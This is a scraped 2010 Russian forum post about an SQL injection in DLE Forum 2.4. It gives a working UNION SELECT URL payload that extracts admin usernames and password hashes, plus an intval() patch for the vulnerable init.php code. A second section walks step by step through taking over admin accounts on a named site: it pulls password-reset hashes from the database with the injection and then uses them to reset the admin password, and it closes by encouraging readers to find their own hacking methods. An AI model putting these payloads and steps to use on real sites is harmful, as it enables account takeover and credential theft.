[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
SQL – инъекция в DLE-Forum 2.4
-==S_k_i_F==- [ Offline ] Дата: Вторник, 15.06.2010, 12:04:18 | Сообщение # 1
.::Smallville::.
Сообщений: 632
[ 168 ]
Награды: 12  
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:

ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_ group=1+limit+1-- ,

Если ВАш сайт уязвим, то в заголовке страницы будет отображен логин, и хеш пароля.
Уязвимость находится в скрипте engine/forum/sources/components/init.php в 446 строке!

if ($_REQUEST['category'])
{
$act = 'category';$cid =$_REQUEST['category'];

$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';

$fid = $_REQUEST['showforum'];

$t_act = '?f'.$fid;
}

if ($_REQUEST['showtopic'])
{
$act = 'topic';

$tid = $_REQUEST['showtopic'];

$t_act = '?t'.$tid;
}

Данный код необходимо заменить на:
if ($_REQUEST['category'])
{
$act = 'category';
$cid = intval($_REQUEST['category']);
$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';

$fid = intval($_REQUEST['showforum']);
$t_act = '?f'.$fid;
}
if ($_REQUEST['showtopic'])
{
$act = 'topic';
$tid = intval($_REQUEST['showtopic']);
$t_act = '?t'.$tid;
}

---------------------------------------------
Как юзать грамотно сию багу
на 8dle.ru был установлен форум с уязвимостью sql inj
сначала идем на страницу 8dle.ru/?do=lostpassword
В поле вписываем имя админа
Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением
И так мы снегерировали хешь, осталось только достать его из базы
_http://8dle.ru/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS (0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16, 17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1-- (Пробелы надо стереть).
указываете ID юзера которого ломаем
смотрим в исходнике полученной страницы *** >> Darknull:md5 <br /> Копируем хешь и идем на ссылку <br /> 8dle.ru/?do=lostpassword&douser=ID&lostid=md5 <br /> вот и перед вами новый админский пароль <br /> Если все сделано верно то вы гений <br /> P.S. 8dle.ru уже залатали востановление пароля <br /> так что ищите свои методы взлома</span></div> <!--%IFEL14%9%><br><br><br><br><br><!%IFEN14%9%--> <BR><HR size="1" width="150" align="left" class="signatureHr"><SPAN class="signatureView"><a class="link" href="http://vodafile.com?ref=jl9kS_8pbl" rel="nofollow" target="_blank"><img src="http://www.php-ucoz.ru/23.png" border="0" alt=""/></a></SPAN> </td></tr><TR><TD class="postBottom" align="center"></TD><TD class="postBottom"> <tr><td class="postBottom" align="center"> </td><td class="postBottom"> <TABLE border="0" width="100%" cellspacing="0" cellpadding="0"><TBODY><TR><TD><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-1873', 'up1873', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;"><img alt="" style="margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_profile.gif" title="Профиль пользователя" /></a> <a href="javascript:;" rel="nofollow" onclick="window.top.location.href='mai'+'lto:'+'php'+'-ucoz'+'@bk.ru';return false;"><img alt="" style="margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_email.gif" title="E-mail адрес" /></a> <img alt="" style="cursor:pointer;margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_www.gif" title="Домашняя страница" onclick="window.open('http://php-ucoz.ru/')" /> <img alt="" style="cursor:pointer;margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_icq.gif" title="ICQ: 577770361" onclick="prompt('ICQ number','577770361');" /><img style="cursor:pointer;margin:0;padding:0;border:0;" src="http://megasoft.3dn.ru/files/skype.gif" title="Skype" onclick="prompt('Skype','disturbed567');" /> </TD><TD align="right" style="padding-right:15px;"></TD><TD width="2%" nowrap="" align="right"><a class="goOnTop" href="javascript:scroll(0,0);"><img alt="" style="margin:0;padding:0;border:0;" src="/.s/img/fr/bt/36/p_up.gif" title="Вверх" /></a></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></td></tr></table></div></div><div class="gDivBottomLeft"></div><div class="gDivBottomCenter"></div><div class="gDivBottomRight"></div> <table class="ThrBotTbl" border="0" width="100%" cellspacing="0" cellpadding="0"> <tr class="ThrBotRow1"><td colspan="2" class="bottomPathBar ThrBotCl11" style="padding-top:2px;"> <table class="ThrForumBarTbl" border="0" width="100%" cellspacing="0" cellpadding="0"> <tr class="ThrForumBarRow1"> <td class="forumNamesBar ThrForumBarCl11 breadcrumbs" style="padding-top:3px;padding-bottom:5px;"> <a class="forumBar breadcrumb-item" href="/forum/">Форум</a> <span class="breadcrumb-sep">»</span> <a class="forumBar breadcrumb-item" href="/forum/57">Форум по DataLife Engine (DLE)</a> <span class="breadcrumb-sep">»</span> <a class="forumBar breadcrumb-item" href="/forum/60">Баги-фиксы</a> <span class="breadcrumb-sep">»</span> <a class="forumBarA" href="/forum/60-2905-1">SQL – инъекция в DLE-Forum 2.4</a> <span class="thDescr">(SQL – инъекция в DLE-Forum 2.4)</span></td><td class="ThrForumBarCl12" > <script> function check_search(s) { if ($(s).find('input[type="text"]').val().length< 3) { _uWnd.alert('Вы ввели слишком короткий поисковой запрос.','',{w:230,h:80,tm:3000}) return; } $(s).submit(); } </script> <form id="thread_search_form" onsubmit="check_search(this);return false;" action="/forum/60-2905" method="GET"> <input class="fastNav" type="submit" value="Ok" id="thread_search_button"><input type="text" name="s" value="" placeholder="Поиск по теме" id="thread_search_field"/> </form> </td></tr> </table></td></tr> <tr class="ThrBotRow2"><td class="ThrBotCl21" width="50%"> <ul class="switches switchesTbl forum-pages"> <li class="pagesInfo">Страница <span class="curPage">1</span> из <span class="numPages">1</span></li> <li class="switchActive">1</li> </ul></td><td class="ThrBotCl22" align="right" nowrap="nowrap"><form name="navigation" style="margin:0px"><table class="navigationTbl" border="0" cellspacing="0" cellpadding="0"><tr class="navigationRow1"><td class="fFastNavTd navigationCl11" > <select class="fastNav" name="fastnav"><option class="fastNavMain" value="0">Главная страница форума</option><option class="fastNavCat" value="14">Администрация</option><option class="fastNavForum" value="17">     MNOGO-softa.ru</option><option class="fastNavForum" value="41">     Графика для MNOGO-softa.ru</option><option class="fastNavForum" value="42">     Жалобы</option><option class="fastNavForum" value="12">     Конкурсы</option><option class="fastNavForum" value="97">     О сайте и форуме</option><option class="fastNavCat" value="69">Скрипты для uCoz</option><option class="fastNavForum" value="20">     Вопросы по uCoz</option><option class="fastNavForum" value="70">     Пользователи</option><option class="fastNavForum" value="71">     Новости сайта</option><option class="fastNavForum" value="72">     Форум</option><option class="fastNavForum" value="73">     Каталог файлов</option><option class="fastNavForum" value="74">     Каталог статей</option><option class="fastNavForum" value="75">     Каталог сайтов</option><option class="fastNavForum" value="77">     Фотоальбом</option><option class="fastNavForum" value="79">     Опросы</option><option class="fastNavForum" value="81">     Другие скрипты для uCoz</option><option class="fastNavForum" value="68">     Скрипты от Mnogo-softa™</option><option class="fastNavCat" value="2">Информация для веб-мастера</option><option class="fastNavForum" value="3">     Раскрутка сайтов</option><option class="fastNavForum" value="6">     Вакансии</option><option class="fastNavForum" value="7">     Заработок</option><option class="fastNavForum" value="28">     Вопросы по раскрутке</option><option class="fastNavForum" value="44">     Учебники</option><option class="fastNavForum" value="90">     Оцениваем сайты</option><option class="fastNavForum" value="92">     Заказ графики</option><option class="fastNavForum" value="105">     Статьи вебмастеру</option><option class="fastNavCat" value="35">Форум по продуктам Adobe</option><option class="fastNavForum" value="45">     Новости</option><option class="fastNavForum" value="36">     Уроки по Photoshop</option><option class="fastNavForum" value="38">     Видеоуроки Photoshop</option><option class="fastNavForum" value="46">     Вопросы по Photoshop и After Effects</option><option class="fastNavForum" value="49">     Готовые PSD работы</option><option class="fastNavForum" value="100">     Готовые работы и исходники After Effects</option><option class="fastNavForum" value="101">     Уроки After Effects</option><option class="fastNavCat" value="57">Форум по DataLife Engine (DLE)</option><option class="fastNavForum" value="58">     Информация</option><option class="fastNavForum" value="59">     Вопросы</option><option class="fastNavForumA" value="60" selected>     Баги-фиксы</option><option class="fastNavForum" value="112">     Хаки</option><option class="fastNavCat" value="29">Курилка</option><option class="fastNavForum" value="48">     О разном</option><option class="fastNavForum" value="102">     Халява</option><option class="fastNavForum" value="30">     Софт</option><option class="fastNavForum" value="31">     Фильмы</option><option class="fastNavForum" value="32">     Разговоры о uCoz</option><option class="fastNavForum" value="33">     Музыка</option><option class="fastNavForum" value="47">     Разговоры о DLE</option><option class="fastNavForum" value="34">     Телефоны</option><option class="fastNavForum" value="94">     Приколы</option><option class="fastNavForum" value="95">     Игры PC,PSP,PlayStation,X-BOX 360</option><option class="fastNavForum" value="104">     Flash игры</option><option class="fastNavCat" value="50">Финансы</option><option class="fastNavForum" value="40">     Продажа и раздача icq номеров</option><option class="fastNavForum" value="51">     Покупка</option><option class="fastNavForum" value="52">     Продажа</option><option class="fastNavCat" value="106">Полезное</option><option class="fastNavForum" value="107">     ICQ, QIP, Skype, Agent, Jabber</option><option class="fastNavForum" value="108">     ОС Windows XP, Windows Vista...</option><option class="fastNavForum" value="109">     WebMoney, E-GOLD, Яндекс.Деньги</option><option class="fastNavForum" value="110">     Kaspersky, Avast, ESET, NOD32</option><option class="fastNavForum" value="111">     Vkontakte, Mamba, Одноклассники</option><option class="fastNavCat" value="53">Програмное обеспечение</option><option class="fastNavForum" value="54">     Вопросы по ПК</option><option class="fastNavForum" value="55">     Проверенные и нужные программы</option><option class="fastNavForum" value="56">     Вопросы по Софту</option><option class="fastNavCat" value="61">Мир CS 1.6</option><option class="fastNavForum" value="62">     Разговоры о Counter Strike</option><option class="fastNavForum" value="63">     Настройка Counter Strike</option><option class="fastNavForum" value="64">     Создание сервера</option><option class="fastNavForum" value="65">     Поиск игроков, создание команд</option><option class="fastNavForum" value="66">     Проблемы в Counter Strike</option><option class="fastNavForum" value="67">     Разное</option><option class="fastNavCat" value="23">Корзина</option><option class="fastNavForum" value="22">     Мусорка</option></select> <input class="fastNav" type="button" value="Ok" onclick="top.location.href='/forum/'+(document.navigation.fastnav.value!='0'?document.navigation.fastnav.value:'');" /> </td></tr></table></form></td></tr> <tr class="ThrBotRow3"><td class="ThrBotCl31"><div class="fFastLogin" style="padding-top:5px;padding-bottom:5px;"><input class="fastLogBt" type="button" value="Быстрый вход" onclick="loginPopupForm();" /></div></td><td class="ThrBotCl32" align="right" nowrap="nowrap"><form method="post" action="/forum/" style="margin:0px"><table class="FastSearchTbl" border="0" cellspacing="0" cellpadding="0"><tr class="FastSearchRow1"><td class="fFastSearchTd FastSearchCl11" >Поиск: <input class="fastSearch" type="text" style="width:150px" name="kw" placeholder="keyword" size="20" maxlength="60" /><input class="fastSearch" type="submit" value="Ok" /></td></tr></table><input type="hidden" name="a" value="6" /></form></td></tr> </table> <script type="text/javascript"> // Copyright AllCity ~ http://allcity.net.ru/ $('span.UhideBlockL').each(function(){ $(this).wrapAll('<div class="UhideBlockA"></div>').html('Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.<br \/>Мы рекомендуем Вам <a href="/index/3">зарегистрироваться<\/a> либо <a href="javascript://" onclick="openLayerB(\'LF\',0,\'/index/40\',\'Login\',250,130,1); return false;">войти<\/a> на сайт под своим именем.'); }); </script> <script type="text/javascript"> // By U.Helper ~ //helper.ucoz.ru/ & AllCity http://allcity.net.ru/ $('.thDescr').each(function(){ var s = $(this).html().match( /sml\[(\w+)\]/ ); $(this).show(); if (s==null) return; s = s[0]; $(this).html( $(this).html().replace(s,'') ); if( $(this).html()=='()' ) $(this).html(''); }) $('.threadDescr').each(function(){ var s = $(this).html().match( /sml\[(\w+)\]/ ); $(this).show(); if (s==null) return; var name = s[1]; s = s[0]; $(this).html( $(this).html().replace(s,'') ); $(this).parent().prev().find('img').attr('src','/threadIcons/'+name+'.png'); }); </script> <script> e=document.getElementsByTagName('A'); for(k=0; k<e.length;k++) { if(e[k].className=="link"){ e[k].innerHTML = '[<b>Ссылки могут видеть только зарегистрированные пользователи<b>]'; e[k].href = '/index/3-0-0'; } } </script> </div><style type="text/css"> .gTopCornerRight {display:none;} </style> <table style="border-width: 0pt;" border="1" cellpadding="0" cellspacing="0"><TBODY><TR><TD width="16" height="40" style="border-style: none; border-width: medium"> <IMG border="0" src="/images/11.gif" width="16" height="45"></TD><TD width="100%" height="40" style="border-style: none; border-width: medium" background="/images/modern_block_header_bg.gif"> <DIV class="eTitle" style="text-align:left;"> <FONT color="#FFFFFF"> <A style="text-decoration: none">Статистика</A></FONT></DIV></TD><TD width="114" height="40" style="border-style: none; border-width: medium" background="/images/modern_block_header_bg.gif"> </TD><TD width="15" height="40" style="border-style: none; border-width: medium"> <IMG border="0" src="/images/12.gif" width="15" height="45"></TD></TR><TR><TD width="16" height="59" background="/images/modern_block_left.gif" style="border-style: none; border-width: medium"> </TD><TD width="100%" height="55" style="border-style: none; border-width: medium" colspan="2"> <center> <TABLE class=gTable cellSpacing=1 cellPadding=3 width="100%" bgColor=#ffffff border=0> <TBODY> <TR> <TR> <TD class=gTableSubTop width="25%">Последние темы</TD> <TD class=gTableSubTop width="25%">Популярные темы</TD> <TD class=gTableSubTop width="25%">Лучшие флудеры</TD> <TD class=gTableSubTop width="25%">Новые пользователи</TD> </TR> <TR> <TD class=gTableBody1 style="PADDING-RIGHT: 10px; PADDING-LEFT: 10px; PADDING-BOTTOM: 10px; PADDING-TOP: 10px"><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/48-1231">Конкурс "Угадай автомобиль"</a></p></td> <td style="vertical-align:top"><p align=right>(78)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/28-6235">Порно С Юной Девкой _952P</a></p></td> <td style="vertical-align:top"><p align=right>(2)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/28-6229">Скачать Трах Пэрис Хилтон _686O</a></p></td> <td style="vertical-align:top"><p align=right>(3)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/17-1484">Баги, ошибки на сайте</a></p></td> <td style="vertical-align:top"><p align=right>(21)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/20-3383">Сделано так как у вас.</a></p></td> <td style="vertical-align:top"><p align=right>(1)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/44-2396">FAQ по uCoz</a></p></td> <td style="vertical-align:top"><p align=right>(6)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/44-6231">Конверты на выписку весна лето от компании Baby Goldfinch</a></p></td> <td style="vertical-align:top"><p align=right>(0)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/102-2694">Здесь заказываем программы,ключи,keygen,patch</a></p></td> <td style="vertical-align:top"><p align=right>(5)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/34-2179">Ваш оператор</a></p></td> <td style="vertical-align:top"><p align=right>(6)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/34-76">Какую трубу вы бы хотели?</a></p></td> <td style="vertical-align:top"><p align=right>(7)</p></td> </tr> </tbody> </table></TD> <TD class=gTableBody1 style="PADDING-RIGHT: 10px; PADDING-LEFT: 10px; PADDING-BOTTOM: 10px; PADDING-TOP: 10px"><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/48-107">Общение</a></p></td> <td style="vertical-align:top"><p align=right>(993)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/22-1606">GOLD-аккаунты к другим файлообменникам</a></p></td> <td style="vertical-align:top"><p align=right>(383)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/102-2172">GOLD-аккаунты к Letitbit.net</a></p></td> <td style="vertical-align:top"><p align=right>(233)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/102-2173">GOLD-аккаунты к Vip-file.com</a></p></td> <td style="vertical-align:top"><p align=right>(156)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/48-1237">Поиграем в смайлики</a></p></td> <td style="vertical-align:top"><p align=right>(115)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/102-2174">GOLD-аккаунты к другим файлообменникам</a></p></td> <td style="vertical-align:top"><p align=right>(93)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/22-683">8-знак</a></p></td> <td style="vertical-align:top"><p align=right>(86)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/48-1231">Конкурс "Угадай автомобиль"</a></p></td> <td style="vertical-align:top"><p align=right>(78)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/22-25">считаем до 100 и обратно</a></p></td> <td style="vertical-align:top"><p align=right>(77)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="//www.mnoga-softa.ucoz.ru/forum/40-2159">Раздача ICQ-номеров!</a></p></td> <td style="vertical-align:top"><p align=right>(61)</p></td> </tr> </tbody> </table></TD> <TD class=gTableBody1 style="PADDING-RIGHT: 10px; PADDING-LEFT: 10px; PADDING-BOTTOM: 10px; PADDING-TOP: 10px"><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-2', 'up2', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">SToRm1k</a></p></td> <td style="vertical-align:top"><p align=right>(2948)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-1873', 'up1873', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">-==S_k_i_F==-</a></p></td> <td style="vertical-align:top"><p align=right>(632)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-250', 'up250', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">k1ngSD</a></p></td> <td style="vertical-align:top"><p align=right>(608)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-17439', 'up17439', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">mimonetut</a></p></td> <td style="vertical-align:top"><p align=right>(412)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-3526', 'up3526', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">SmaileS</a></p></td> <td style="vertical-align:top"><p align=right>(400)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-350', 'up350', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">Kojin</a></p></td> <td style="vertical-align:top"><p align=right>(387)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-218', 'up218', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">Rmk</a></p></td> <td style="vertical-align:top"><p align=right>(370)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-17233', 'up17233', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">adrefefex</a></p></td> <td style="vertical-align:top"><p align=right>(357)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-380', 'up380', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">}{0TT@БЬ)Ч</a></p></td> <td style="vertical-align:top"><p align=right>(341)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-1004', 'up1004', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">Aldo</a></p></td> <td style="vertical-align:top"><p align=right>(306)</p></td> </tr> </tbody> </table></TD> <TD class=gTableBody1 style="PADDING-RIGHT: 10px; PADDING-LEFT: 10px; PADDING-BOTTOM: 10px; PADDING-TOP: 10px"><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79521', 'up79521', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">ttaletfzfe</a></p></td> <td style="vertical-align:top"><p align=right>(19:57:44)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79520', 'up79520', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">ztaletaxuz</a></p></td> <td style="vertical-align:top"><p align=right>(06:59:26)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79519', 'up79519', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">ctaletkrzs</a></p></td> <td style="vertical-align:top"><p align=right>(06:59:01)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79518', 'up79518', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">gtaleteljd</a></p></td> <td style="vertical-align:top"><p align=right>(16:47:55)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79517', 'up79517', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">staletmhfr</a></p></td> <td style="vertical-align:top"><p align=right>(12:49:05)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79516', 'up79516', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">btaletkokj</a></p></td> <td style="vertical-align:top"><p align=right>(08:58:29)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79515', 'up79515', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">ukvartirachink</a></p></td> <td style="vertical-align:top"><p align=right>(12:11:40)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79514', 'up79514', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">etaletcxbm</a></p></td> <td style="vertical-align:top"><p align=right>(07:46:24)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79513', 'up79513', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">leifwoolnug</a></p></td> <td style="vertical-align:top"><p align=right>(09:15:37)</p></td> </tr> </tbody> </table><table style="width:100%"> <tbody> <tr> <td style="vertical-align:top"><p align=left><a href="javascript:;" rel="nofollow" onclick="window.open('/index/8-79512', 'up79512', 'scrollbars=1,top=0,left=0,resizable=1,width=700,height=375'); return false;">ytaletiomo</a></p></td> <td style="vertical-align:top"><p align=right>(01:19:02)</p></td> </tr> </tbody> </table> <center>Новых сегодня:<b>0<b></center> </TD></TR></TBODY></TABLE> <script type="text/javascript" src="/js/toggleforums.js"></script> <TABLE style="WIDTH: 100%"> <TBODY> <TR> <TD style="VERTICAL-ALIGN: top"> <P align=left><A href=""></A></P></TD> <TD style="VERTICAL-ALIGN: top"> <P align=right></P></TD></TR></TBODY></TABLE> </ a> </center></div> <!-- </body> --><!-- </body> --> </TD><TD width="15" height="59" background="/images/modern_block_right.gif" style="border-style: none; border-width: medium"> </TD></TR><TR><TD width="16" height="1" style="border-style: none; border-width: medium"> <IMG border="0" src="/images/21.gif" width="16" height="22"></TD><TD width="100%" height="1" style="border-style: none; border-width: medium" background="/images/25.gif" colspan="2"> </TD><TD width="15" height="1" style="border-style: none; border-width: medium"> <IMG border="0" src="/images/22.gif" width="15" height="22"></TD></TR></TBODY></TABLE> <!-- </body> --> <!------------------------------------------------------------> <table cellpadding="0" cellspacing="0" class="modern_block"> </table> <!------------------------------------------------------------> </td> </td> </tr> </table> <script type="text/javascript">hide_hidded_blocks_divs();</script> </td> <td width="8" style="background: #ffffff url('/images/modern_body_border_right.gif') right repeat-y;" nowrap></td> </tr> <tr> <td colspan="3"> <table style="border-width: 0pt;" border="1" cellpadding="0" cellspacing="0" background="/images/modern_footer_main_bg.gif"> <tr> <td width="22" height="1" style="border-style: none; border-width: medium"> <img border="0" src="/images/modern_footer_main_border_left.gif" width="18" height="75"></td> <td width="100%" height="1" style="border-style: none; border-width: medium"> <address> <span style="font-style: normal"> <FONT color="#ffffff"> Владельцы и создатели данного сайта не несут ответственность за использование и содержание ссылок и информации, представленных на этом сайте.<br> Переделка шаблона by <b><a href="http://www.mnogo-softa.ru/index/8-2">SToRM</a>.Сайт оптимизирован для просмотра с разрешением<br> 1024x768, 1280x800, 1280x1024 и 1600x1200 браузером Opera. <noindex><script>document.write('This feature is for Premium users only!');</script></noindex> <noindex><script>document.write('This feature is for Premium users only!');</script></noindex> <noindex><script>document.write('This feature is for Premium users only!');</script></noindex> </FONT></td> <td width="616" height="1" style="border-style: none; border-width: medium" align="right"><div id="banners" style="width: 100%; height: 31"> <!--U1VIDEO1Z--><table border="1" cellpadding="0" cellspacing="0" style="border-width:0; border-collapse: collapse" bordercolor="#111111" width="454" height="25"> <tr> <td width="90" height="33" style="border-style: none; border-width: medium"> <noindex> <!--LiveInternet counter--><script type="text/javascript">document.write("<a href='http://www.liveinternet.ru/click' rel="nofollow" target=_blank><img src='//counter.yadro.ru/hit?t22.6;r" + escape(document.referrer) + ((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ";u" + escape(document.URL) + ";" + Math.random() + "' border=0 width=88 height=31 alt='' title='LiveInternet: показано число просмотров за 24 часа, посетителей за 24 часа и за сегодня'><\/a>")</script><!--/LiveInternet--> </noindex> </td> <td width="90" height="33" style="border-style: none; border-width: medium"> <noindex> <a rel="nofollow" href="/panel/?a=ustat&u=mnoga-softa&d=0&il=ru" target="_blank" title="uCoz Counter"> <img alt="" src="/stat/1732839935" height="31" width="88" /></a> </noindex> </td> <td width="90" height="33" style="border-style: none; border-width: medium"> <noindex><a href="/" target="_blank" title="Счетчик тИЦ и PR" rel="nofollow"><img src="http://counter.pr-cy.ru/prcy/www.mnogo-softa.ru" alt="PR-CY.ru" width="88" height="31" border="0" /></a></noindex> </td> <td width="90" height="33" style="border-style: none; border-width: medium"> <noindex> <!-- I.UA counter --><a href="/" rel="nofollow" target="_blank" onclick="this.href='http://i.ua/r.php?76374';" title="Rated by I.UA"> <script type="text/javascript" language="javascript"><!-- iS='<img src="http://r.i.ua/s?u76374&p79&n'+Math.random(); iD=document;iD.cookie="iua=1";if(iD.cookie)iS+='&c1'; iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth) +"&w"+screen.width+'&h'+screen.height; iT=iD.referrer.slice(7);iH=window.location.href.slice(7); 